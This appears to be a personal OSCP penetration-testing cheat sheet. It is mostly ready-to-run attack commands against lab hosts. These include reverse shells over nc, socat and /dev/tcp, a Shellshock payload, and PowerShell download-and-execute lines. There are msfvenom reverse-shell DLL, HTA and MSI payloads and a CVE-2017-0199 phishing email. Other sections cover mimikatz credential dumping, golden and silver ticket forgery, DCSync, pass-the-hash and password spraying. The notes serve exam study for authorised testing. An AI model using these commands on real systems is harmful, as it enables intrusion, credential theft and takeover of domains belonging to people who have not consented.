# OSCP

[ToC]

-------------------------------------

## Notes

https://github.com/AidenPearce369/OSCP-Notes
https://fareedfauzi.gitbook.io/oscp-notes/
https://book.hacktricks.xyz/welcome/readme
https://github.com/Tib3rius/AutoRecon
https://hackmd.io/@9PBGIdOQSsCUy3PqgbLrdw/SyZpmXA49
AD: https://zer1t0.gitlab.io/posts/attacking_ad/#domain-name
https://hackercat.org/windows/windows-for-active-directoryad-notes
File transfer: https://paper.seebug.org/834/#windows
https://github.com/swisskyrepo/PayloadsAllTheThings
Web reference: https://github.com/stevenyu113228/My-Security-Resources
A huge, excellent pile of resources: https://github.com/swisskyrepo/PayloadsAllTheThings

## Pivoting

https://blog.csdn.net/qq_27828281/article/details/90742449

### chisel

https://www.codebuug.com/cs115242849/
https://github.com/jpillora/chisel

* Forward: the attacker box reaches the internal port 8000 by connecting to 127.0.0.1:5555
  External: `./chisel client [relay IP]:[relay listening port] [port forwarded to the attacker]:[target IP]:[target internal port]`
  e.g. `./chisel client 10.10.11.105:6666 5555:127.0.0.1:8000`
  Internal: `./chisel server -p 6666`
* Reverse: the attacker box reaches the internal port 8000 by connecting to 127.0.0.1:5555
  External: `./chisel server -p [port the target connects back to] --reverse`
  e.g. `./chisel server -p 6666 --reverse`
  Internal: `./chisel client [relay IP]:[attacker's listening port] R:[port forwarded to the attacker]:[target IP]:[internal port to reach]`
  e.g. `./chisel client 10.10.14.3:6666 R:5555:127.0.0.1:8000`
* Dynamic (SOCKS):
  External: `./chisel server -p 6666 --reverse`
  Internal: `./chisel client 10.10.14.3:6666 R:socks`
  proxychains config: /etc/proxychains4.conf
  `proxychains4 curl http://127.0.0.1:8000`
* Windows setup: enable port forwarding on the dual-homed C2 host
  kali: 192.168.49.54:8080
  C2: 192.168.54.101 / 172.16.54.101:4444
  Internal: 172.16.54.102
  `netsh interface portproxy add v4tov4 listenport=4444 listenaddress=172.16.54.101 connectport=8080 connectaddress=192.168.49.54`
  Download mimikatz from the external host to 172.168.54.102 through the C2:
  `powershell -nop -ep bypass -c iex(new-object system.net.webclient).downloadfile('http://172.16.54.101:4444/mimikatz.exe','c:\users\public\mimikatz.exe')`
  ![](https://i.imgur.com/cpIbtDv.png)

### ssh pivoting

https://johnliu55.tw/ssh-tunnel.html
https://blog.stevenyu.tw/2022/08/11/ssh-tunnel-port-forwarding-%E9%80%9F%E8%A8%98%E6%B3%95/

First copy your public key into the target's authorized_keys.

* Forward: the attacker box reaches the internal port 8000 by connecting to 127.0.0.1:5555
  `ssh strapi@10.10.11.105[target] -L 5555:127.0.0.1:8000`
* Dynamic:
  `ssh strapi@10.10.11.105 -D 1080[socks]`
* SSH port forwarding, double pivoting
  `ssh -N -L 0.0.0.0:4455:172.16.50.217:445 database_admin@10.4.50.215`
  Port 4455 on our own host goes through port 22 on 10.4.50.215 and is then forwarded to port 445 on 172.16.50.217, which is a double pivot.
* Dynamic forwarding (not limited to a specific port)
  `ssh -N -D 0.0.0.0:9999 database_admin@10.4.50.215`
  Port 9999 on our own host goes through port 22 on 10.4.50.215 and on to the 172.16.50.X network.
* Remote port forwarding
  `ssh -N -R 127.0.0.1:2345:10.4.50.215:5432 kali@192.168.118.4`
* Dynamic remote port forwarding
  `ssh -N -R 9998 kali@192.168.118.4`
  In short, this is a way to get around firewall restrictions.

### Socat

`socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432`

## Internet Enumeration

### Rustscan

`rustscan -a <IP>` quick scan of open ports
`rustscan -a <IP> --range 1-1000 --scan-order "Random"`
`rustscan -a <IP> -- -sC -sV -O -T4 -n` chained with nmap

### nc

`nc -zv 10.4.152.64 9000-9100 -w 1` probe a port range

### nmap

- Static Binary
  - https://github.com/ernw/static-toolbox/releases
  - https://github.com/andrew-d/static-binaries/blob/master/binaries/windows/x86/nmap.exe
- Parameters
  - `-A` : Enable OS detection, version detection, script scanning, and traceroute
  - `-p-` : Scan all ports
  - `-p 1000-9999` : Scan ports 1000 to 9999
  - `-sV` : Service version
  - `-Pn` : No ping
  - `--script=vuln` : Vulnerability scan
  - `-p139,445` : Only scan ports 139 and 445
  - `-sn` : Host ping scan
  - `--source-port 4444` : Use source port 4444 for the scan
- Fast UDP Scan
  - `sudo nmap -sUV -T4 -F --version-intensity 0 {IP}`
- Commonly used
  `nmap <IP> -p <port> -sC -sV -T4 -n`
  `nmap --script vuln [ip target]`
  `nmap -p 80 --script=*vuln* [ip target]`
  `sudo nmap -p- --min-rate 10000 -oA scans/nmap-alltcp <IP>`
  `sudo nmap -p <port> -sCV -oA scans/nmap-tcpscripts <ip>`

### DNS Enumeration

```
nslookup server ip
dig @10.10.10.192 blackfield.local
dig axfr @10.10.10.175 sauna.htb
dig @10.10.11.174 +short support.htb any
dnsrecon -d megacorpone.com -t std
dnsrecon -d megacorpone.com -D ~/list.txt -t brt
dnsenum megacorpone.com
nslookup mail.megacorptwo.com
nslookup -type=TXT info.megacorptwo.com 192.168.50.151
```

## Reverse shell

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://www.revshells.com/
https://highon.coffee/blog/reverse-shell-cheat-sheet/
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

### Non-interactive shell

* `python -c 'import pty;pty.spawn("/bin/bash")'`
* `python3 -c 'import pty;pty.spawn("/bin/bash")'`
* `python3 -c 'import pty; pty.spawn("/bin/sh")'` get a full shell
* `/usr/bin/script -qc /bin/bash /dev/null`

```
Press Ctrl + Z, which shows
[1]+ Stopped nc -nvlp 1234
stty raw -echo; fg
Press Enter twice
stty -a
After reading the rows and columns values, run on the upgraded tty:
export TERM=xterm-256color
stty rows 32 columns 69
Now we have a tty that is good enough to work with.
```

### nc

https://github.com/int0x33/nc.exe

```
#LISTENING:
nc -lvnp IP port
#Connecting
nc -e /bin/sh [listen_ip] [listen_port]
```

* Transfer file
  Receive: `nc -lvp 8888 > out.file`
  Send: `nc 10.10.14.3 8888 < outfile`

### socat

```
#LISTENING:
socat -ddd TCP4-LISTEN:<listen_port> STDOUT
#Connecting
socat TCP4:10.11.0.22:443 EXEC:/bin/bash
#Port Forwarding
socat -ddd TCP-LISTEN:2345,fork TCP:10.4.50.215:5432
```

### PostgreSQL

```
#Login
psql -h 192.168.50.63 -p 2345 -U postgres
#Use it
\l : list all databases
\c <database> : switch to a database
```

### ssh

`ssh -i rsa_id user@ip`

### Windows reverse shell payload

https://github.com/t3l3machus/hoaxshell

### impacket (python scripts for network protocols)

https://github.com/SecureAuthCorp/impacket.git
https://www.cnblogs.com/backlion/p/10676339.html
https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

## Target enumeration

### Nmap scripts to enumerate

```
nmap --script smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-services,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-protocols,smb-os-discovery -p <port> <IP>
nmap --script smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-cve-2017-7494.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse,smb-vuln-regsvc-dos.nse,smb-vuln-webexec.nse -p<port> <IP>
sudo nmap -p80 --script=http-enum <IP>
sudo nmap -p80 -sV 192.168.50.20
```

Tests for SMB vulnerabilities.

### smbmap

`smbmap -H IP`
`smbmap -H 10.10.10.100 -d (DOMAIN) -u (USER) -p (PASSWORD)`
`smbmap -H 10.10.10.192 -u null` also try this one

### nbtscan

`nbtscan -r IP`

### enum4linux

`enum4linux -A -a IP` enumerates SMB-related services extensively

### smbclient

`smbclient -L IP -U USER`
`smbclient //10.10.10.149/IPC$ -U hazard`
`smbclient -N //10.10.10.169/admin$`

```
Download all files:
recurse ON
prompt OFF
mget *
```

### rpc

https://room362.com/post/2017/reset-ad-user-password-with-linux/

`rpcclient -U support 10.10.10.192`
`rpcclient -U "" -N 10.10.10.161`
`enumdomusers` enumerate users
`enumdomgroups` enumerate user groups
`querygroup 0x200` show group information
`queryuser XXXX` show user information
`setuserinfo2 administrator 23 '1qaz@WSX'` change a user's password

* mssqlclient
  `python3 mssqlclient.py [Target_IP] -windows-auth`

### smtp

`telnet <IP> 25`

* Check whether a user exists
  `smtp-user-enum -M <RCPT> -U <test-users.txt> -t <10.10.10.77>`

## Windows penetration approach

https://i.imgur.com/3D0GDwH.jpg

## Windows Enumeration

### Kerbrute

* Password Spraying
  `kerbrute passwordspray --dc <ip> -d <domain> user.txt <password>`
* Can find AS-REP roastable users
  `kerbrute userenum -d <domain> /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc <ip>`

### Kerberoasting

* powershell
  `powershell -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1');import-module .\powerview.ps1;Get-NetUser -SPN`
* Via Impacket (the IP must be the DC's IP)
  `sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete`

### winpeas

https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe

### windapsearch

List LDAP names.
https://github.com/ropnop/windapsearch.git

`python windapsearch.py -d hb.local --dc-ip 10.10.10.161 -U`
`python windapsearch.py -d hb.local --dc-ip 10.10.10.161 --custom "objectclass=*"`

Look for users in the DnsAdmins group: DNS Admin Privesc in Active Directory (AD) (Windows)
https://medium.com/techzap/dns-admin-privesc-in-active-directory-ad-windows-ecc7ed5a21a2

### windows-exploit-suggester

Step 1: after getting in, run systeminfo and save its output in a txt file.

`./windows-exploit-suggester.py --database 2023-03-01-mssb.xls --systeminfo systeminfo.txt`
`./windows-exploit-suggester.py --upgrade` update the database

## Windows Attack

### Rubeus usage

#### Request a TGT

`Rubeus asktgt /user:<account> /password:<Password> /domain:corp.com /dc:"ad01.corp.com" /nowrap /ptt /outfile:ticket.kirbi`

/nowrap: makes the output ticket format easier to handle
/ptt: import the ticket into memory
/outfile: write the ticket to a file (optional)

#### AS-REP Roasting

`Rubeus.exe asreproast /format:<hashcat or john> /outfile:<hash.txt>`

Returns hashes for AD accounts configured without Kerberos pre-authentication; crack them with hashcat or John.

#### Kerberoasting

`Rubeus.exe kerberoast /format:<hashcat or john> /outfile:<hash.txt>`

Automatically finds users with an SPN in AD and returns the service account hashes for hashcat or john to crack.

#### Pass the Hash

`Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt`

### mimikatz usage

#### Common modules

* sekurlsa: module for enumerating tickets and password hashes
* privilege: module for raising privileges
* kerberos: Kerberos-related module
* lsadump: Lsadump module

#### Usage

```
mimikatz privilege::debug           raise privileges
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords   list all user credentials
mimikatz sekurlsa::tickets          list all TGTs in memory
```

* List all available kerberos tickets in memory
  `mimikatz sekurlsa::tickets`
* Dump SAM Database
  `mimikatz lsadump::sam`
* Dump SECRETS Database
  `mimikatz lsadump::secrets`
* DCSync
  `mimikatz lsadump::dcsync /domain:<DomainFQDN> /all`

### AS-REP Roasting

#### GetNPUsers

`python3 GetNPUsers.py <domain>/<account>:<password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>` general format

`python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>` brute force one user at a time from a user list

`impacket-GetNPUsers -dc-ip IP -userfile user.txt -format <john or hashcat> <domain>/` via LDAP

`impacket-GetNPUsers -dc-ip 10.10.10.161 -request 'htb.local/'`

`GetNPUsers.py -dc-ip 192.168.1.105 ignite.local/ -usersfile users.txt -format john -outputfile hashes` converts the hashes into a format John can crack and saves them to the hashes file

#### Rubeus

`Rubeus.exe asreproast /format:<hashcat or john> /outfile:<hash.txt>`

### Kerberoasting

#### GetUserSPNs

`python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> -outputfile <output_TGSs_file>` general format

* Request all SPNs registered under users and save them to hash.txt
  `python3 GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:<password> -outputfile hash.txt`
* Request the TGS for Wayne's SPN and save it to hash2.txt
  `python3 GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:<password> -outputfile hash2.txt -request-user <wayne>`

`for user in $(cat user.txt);do GetNPUsers.py -no-pass -dc-ip <ip> htb/${user} | grep -v Impacket;done` after finding users, put them in a txt file and fetch their hashes

#### Rubeus

* Fetch TGS-REP (Kerberoasting)
  `Rubeus.exe kerberoast /format:<hashcat or john> /outfile:<hash.txt>`
  Automatically finds users with an SPN in AD and returns the service account hashes for hashcat or john to crack.

#### mimikatz

`kerberos::ask /target:server/win7.xie.com:1433/MSSQL`

#### PowerShell

`iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")`
`Invoke-Kerberoast -OutputFormat <TGSs_format [hashcat | john]> | % { $_.Hash } | Out-File -Encoding ASCII <output_TGSs_file>`

### PTH (Pass The Key/Pass the Hash)

#### getTGT

* Request the TGT with hash
  `python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>`
* Request the TGT with aesKey (stronger encryption, probably stealthier because it is what Microsoft uses by default)
  `python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>`
* Request the TGT with password
  `python getTGT.py <domain_name>/<user_name>:[password]`
* Set the TGT for impacket use
  `export KRB5CCNAME=<TGT_ccache_file>`
* Log in

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

### Pass the Ticket

When you have compromised a machine with high privileges but cannot move laterally, export the tickets with mimikatz `sekurlsa::tickets /export` and check whether any TGS can be used for lateral movement.

`kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi` after importing the ticket you can access that service with its privileges

### Silver Ticket

#### Ticketer

* To generate the TGS with NTLM
  `python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>`
* To generate the TGS with AES key
  `python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>`
* Set the ticket for impacket use
  `export KRB5CCNAME=<TGS_ccache_file>`
* Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### mimikatz

* To generate the TGS with NTLM
  `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>`
* To generate the TGS with AES 128 key
  `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>`
* To generate the TGS with AES 256 key (stronger encryption, probably stealthier because it is what Microsoft uses by default)
  `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>`
* Inject TGS with Mimikatz
  `mimikatz # kerberos::ptt <ticket_kirbi_file>`

#### Rubeus

`Rubeus.exe ptt /ticket:<ticket_kirbi_file>`

### Golden Ticket

#### Ticketer

* To generate the TGT with NTLM
  `python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>`
* To generate the TGT with AES key
  `python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>`
* Set the ticket for impacket use
  `export KRB5CCNAME=<TGS_ccache_file>`
* Execute remote commands with any of the following by using the TGT

```
python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

#### mimikatz

* To generate the TGT with NTLM
  `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>`
* To generate the TGT with AES 128 key
  `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>`
* To generate the TGT with AES 256 key (stronger encryption, probably stealthier because it is what Microsoft uses by default)
  `mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>`
* Inject TGT with Mimikatz
  `mimikatz # kerberos::ptt <ticket_kirbi_file>`

#### Rubeus

`Rubeus.exe ptt /ticket:<ticket_kirbi_file>`

### DCSync

#### secretsdump

https://pure.security/dumping-windows-credentials/
https://wwwstar.medium.com/%E5%85%A7%E7%B6%B2%E6%BB%B2%E9%80%8F-pass-the-hash-pth-%E6%94%BB%E6%93%8A%E6%89%8B%E6%B3%95%E5%8F%8A%E9%98%B2%E7%A6%A6-%E5%81%B5%E6%B8%AC%E6%8E%AA%E6%96%BD-e1d15e807a67

* Dump every user's hash
  `impacket-secretsdump 'domain/user:pass@IP' -just-dc`
  `impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL > hash.txt`
  `secretsdump.py -system system.save -ntds ntds.dit LOCAL`
* Dump the krbtgt account hash
  `secretsdump.py <domain>/<account>:<password>@<DC_IP> -just-dc-user krbtgt`

```
reg save HKLM\SYSTEM c:\system.save & reg save HKLM\SAM c:\sam.save
mimikatz # lsadump::sam /system:c:\system.save /sam:c:\sam.save
```

#### From inside the network, Mimikatz can be used

`lsadump::dcsync /domain:<domain> /all /csv` (`/all` can be replaced with a specific user)

### Lateral movement (psexec etc.)

#### psexec

* Hash login (domain form)
  `impacket-psexec domain/user@ip -hashes hash:hash`
  `psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.129.95.153 administrator@10.129.95.153`
* Password login
  `impacket-psexec htb.local/svc-alfresco:s3rvice@10.129.143.194`
* Windows lateral movement
  `./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd`

#### smbexec

* Password login
  `impacket-smbexec htb.local/svc-alfresco:s3rvice@10.129.143.194`
* Hash login
  `impacket-smbexec htb.local/svc-alfresco@10.129.143.194 -hashes <hash>`
* Login with a different codec (default is UTF-8)
  `impacket-smbexec htb.local/svc-alfresco@10.129.143.194 -codec gbk`
* Use a different share (default is C$)
  `impacket-smbexec htb.local/svc-alfresco@10.129.143.194 -codec gbk -share admin$`

#### ntlmrelayx [relaying to get a ticket]

`impacket-ntlmrelayx -t ldap://10.10.10.161 --escalate-user john`
`impacket-psexec 'htb.local/john:abc123!@myip'`

#### wmiexec

* Hash login
  `wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff' -dc-ip 10.10.10.175 administrator@10.10.10.175`
* Password login
  `wmiexec htb.local/svc-alfresco:s3rvice@10.129.143.194`

#### dcomexec

* Hash login
  `dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff' -dc-ip 10.10.10.175 administrator@10.10.10.175`
* Password login
  `dcomexec.py htb.local/svc-alfresco:s3rvice@10.129.143.194`

#### lookupsid

`impacket-lookupsid hazard:stealth1agent@10.10.10.149`

#### Ldapsearch

`ldapsearch -x -H "ldap://<10.10.10.175>" -s base namingcontexts`
`ldapsearch -x -H "ldap://10.10.10.161" -b "DC=htb,DC=LOCAL" -s sub`
`ldapsearch -x -H ldap://dc.support.htb -D 'hack@xie.com' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=Users,DC=SUPPORT,DC=HTB"`

#### Evil-winrm (5985, 5986)

`evil-winrm -i IP -u User -p Password`
`evil-winrm -i IP -u User -H hash`
`evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -s . -S`

***`Bypass-4MSI`***

## bruteforce

### crackmapexec

`crackmapexec smb 10.10.10.169 -u /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -p 'Welcome123!' --continue-on-success`
`crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success`

### hydra

`hydra 10.10.10.43 -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"`

-p password, -P wordlist, -l username; the trailing part is what you add when brute-forcing a web login form.

### Directory brute force

* Subdirectories
  `ffuf -c -w <wordlist> -u http://<url>/FUZZ`
  `dirsearch.py -u <url>`
  `gobuster dir -u <URL> -w <wordlist> -x .php,.html`
  `gobuster dir -u <IP> -w /usr/share/wordlists/dirb/common.txt -t 5`
* Sub-domains
  `ffuf -c -w <wordlist> -u http://FUZZ.<url>`
  `gobuster dns -d <domain> -w <wordlist>`

#### Responder (get NTLM hash)

`sudo responder -I eth0`

#### xfreerdp

`xfreerdp /v:{ip} /cert:ignore /u:{username} /size:80%`

#### ssh problem

`ssh -o KexAlgorithms=diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedKeyTypes=+ssh-rsa root@10.10.10.7`

#### SIP extension

`svwar -m INVITE -e100-999 10.10.10.7`
https://zhuanlan.zhihu.com/p/354513767

#### lsass.dmp open

https://en.hackndo.com/remote-lsass-dump-passwords/

#### Subversion Repository Service - Port 3690

`svn list svn://10.10.10.203:3690`
`svn cat svn://10.10.10.203:3690/moved.txt`
`svn checkout svn://10.10.10.203:3690`
`svn diff -r2`
https://idiothacker.com/hackthebox-walkthrough-worker/

#### smtp

`smtp-user-enum -M RCPT -U mail.txt -t 10.10.10.77`

* cve-2017-0199
  https://github.com/bhdresh/CVE-2017-0199
  `msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=6666 -f hta-psh -o msfv.hta`
  `python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w invoice.rtf -u http://10.10.14.3:8000/msfv.hta -t rtf -x 0`
  `sendEmail -f 0xdf@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a invoice.rtf -s 10.10.10.77 -v`

#### mount

`mount -t cifs //10.10.10.134/backups /mnt -o user=,password=`

## Web penetration

### Shellshock

* Check whether a path is vulnerable to Shellshock
  `nmap -sV -p 80 --script http-shellshock --script-args uri=/cgi-bin/<user.sh> <IP>`
* POC
  `User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/<IP>/443 0>&1`

## Linux

https://medium.com/schkn/linux-privilege-escalation-using-text-editors-and-files-part-1-a8373396708d

* Privilege escalation reference site
  https://gtfobins.github.io/
* PATH
  `export PATH=/tmp:$PATH`
  `echo $PATH`

#### linpeas

`curl http://10.10.14.5:8000/linpeas.sh | sh`

#### Linux priv

* Linux SUID

```
#Find SUID
find / -perm -u=s -type f 2>/dev/null
```

![](https://i.imgur.com/UQ0E1gp.png)

```
CMD="/bin/sh"
php7.4 -r "pcntl_exec('/bin/sh', ['-p']);"
```

```
#Find SGID
find / -perm -g=s -type f 2>/dev/null
```

* uname -a < 4.4.0
  https://www.exploit-db.com/exploits/44298
* pwnkit pkexec
  https://github.com/arthepsy/CVE-2021-4034
* Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation
  https://www.cnblogs.com/xiaozi/p/13370721.html
  `gcc 44298.c -o a.out`
* If a scheduled job performs backups, a symlink makes it back up the linked directory as well
  `ln -s /home/luis/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/`
* sudo exiftool

```
LFILE:/usr/bin/calendar
INPUT=/bin/bash
sudo exiftool -filename $LFILE $INPUT   (run it several times)
```

## Windows privilege escalation

https://github.com/nickvourd/Windows_Privilege_Escalation_CheatSheet
https://github.com/gtworek/Priv2Admin

### Potato

* Juicy Potato
  https://github.com/ohpe/juicy-potato
* Lovely Potato (automates Juicy Potato)
  https://github.com/TsukiCTF/Lovely-Potato
* Local Potato
* God Potato
* Rogue Potato
  https://github.com/antonioCoco/RoguePotato
* PrintSpoofer (Win Server 2016, 2019, Win10)
  https://github.com/itm4n/PrintSpoofer

`where /r c: *password*`

* DNS Admin group PrivEsc (domain group: DnsAdmins)
  `msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 -f dll -o rev.dll`
  `smbserver.py s . -smb2support -username df -password df`
  `net use \\10.10.14.14\s /u:df df`
  or
  `smbserver.py Desktop . -smb2support`
  `powershell copy \\192.168.32.128\Desktop\a.html .`
  `dnscmd.exe /config /serverlevelplugindll \\10.10.14.11\s\rev.dll`
  `sc.exe \\resolute stop dns`
  `sc.exe \\resolute start dns`
  LINUX: `smbget smb://192.168.32.128/SMB/id_rsa -o id`
* Copy-FileSeBackupPrivilege, SeBackupPrivilege (domain group: Backup Operators)
  https://github.com/giuliano108/SeBackupPrivilege
  https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960
  useful: https://raw.githubusercontent.com/Hackplayers/PsCabesha-tools/master/Privesc/Acl-FullControl.ps1
  `Acl-FullControl -user 'blackfield\svc_backup' -path C:\users\administrator`
* Checking AlwaysInstallElevated
  AlwaysInstallElevated set to 1 in HKLM!
  AlwaysInstallElevated set to 1 in HKCU!
  `msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=443 -f msi -o rev.msi`
  `msiexec /quiet /qn /i rev.msi`
* check priv

```
icacls Administrator
# F full access, M modify
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
# grant a permission
icacls root.txt /grant alfred[user]:F
```

* RDP

```
net localgroup "Remote Desktop Users" "<account>" /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```

powershell
`Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0`

* mimikatz

```
privilege::debug
sekurlsa::logonpasswords
```

```
lsadump::secrets
vault::cred /patch
```

`reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f`

On Windows 10 or Windows Server 2012 and later, this registry change lets Mimikatz recover credentials (requires a reboot).

## Passwords

#### hashcat

https://hashcat.net/wiki/doku.php?id=example_hashes

`hashcat -m 18200 hash.txt /usr/share/wordlists/rockyou.txt`

* Base64
  `cat <file> | base64 -d > <file>.decode`
* zip2john, convert a zip to a hash
  `zip2john <file> 2>/dev/null | tee <file>.hash`
* John
  `john <file>.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=<PKZIP format>`
* Crack TGS-REP (Kerberoasting)
  `sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force`
* Crack AS-REP
  `sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force`

## Powershell

### Download

`Powershell -c "IWR -useBasicParsing http://10.10.14.3:8000/SharpHound.ps1 -OutFile ./SharpHound.ps1"`
`powershell -exec bypass -c "iex(new-object system.net.webclient).downloadstring('http://<host>/PowerUp.ps1'); invoke-AllChecks"`
`certutil -urlcache -f http://10.10.16.35:8000/ms11-046.exe ms11-046.exe`

host: `python2.7 smbserver.py share 'pwd'` start the smbserver
client: `copy \\<IP>\<sharename>\<file>.exe <file>.exe` copy the file

Upload a file:
`net use \\10.10.14.26\mac /u:mac mac`
`copy 20220314010252_BloodHound.zip \\10.10.14.26\mac\`

### Credential cracking

* Recover the password stored in cred.xml
  `powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"`

### PrivescCheck

https://github.com/itm4n/PrivescCheck

* Download and run
  `powershell -ep bypass "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.2:8000/PrivescCheck.ps1'); Invoke-PrivescCheck"`

### Bloodhound

* Download
  `IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8000/SharpHound.ps1');`
* Run
  `invoke-bloodhound -collectionmethod all -domain htb.local -ldapuser svc-alfresco -ldappass s3rvice`
* With Python it can be run from your own host
  `bloodhound-python -d <htb.local> -u <svc-alfresco> -p <s3rvice> -gc <forest.htb.local> -c all -ns <10.129.75.109> --zip`

### Powerview 3.0

https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-powerview

* Download and import the module
  `certutil -urlcache -split -f http://10.10.14.3:8000/PowerView.ps1`
  `import-module ./PowerView.ps1`

Get Current Domain: `Get-ADDomain`
Enum Other Domains: `Get-ADDomain -Identity <Domain>`
Get Domain SID: `Get-DomainSID`
Get Domain Controllers: `Get-ADDomainController`
Enumerate Domain Users: `Get-ADUser -Filter * -Identity <user> -Properties`
Enum Domain Computers: `Get-ADComputer -Filter * -Properties`

* Change the owner
  `Set-DomainObjectOwner -identity claire -OwnerIdentity tom`
  Transfers ownership of the claire object to tom.
* Grant the reset-password right
  `Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword`
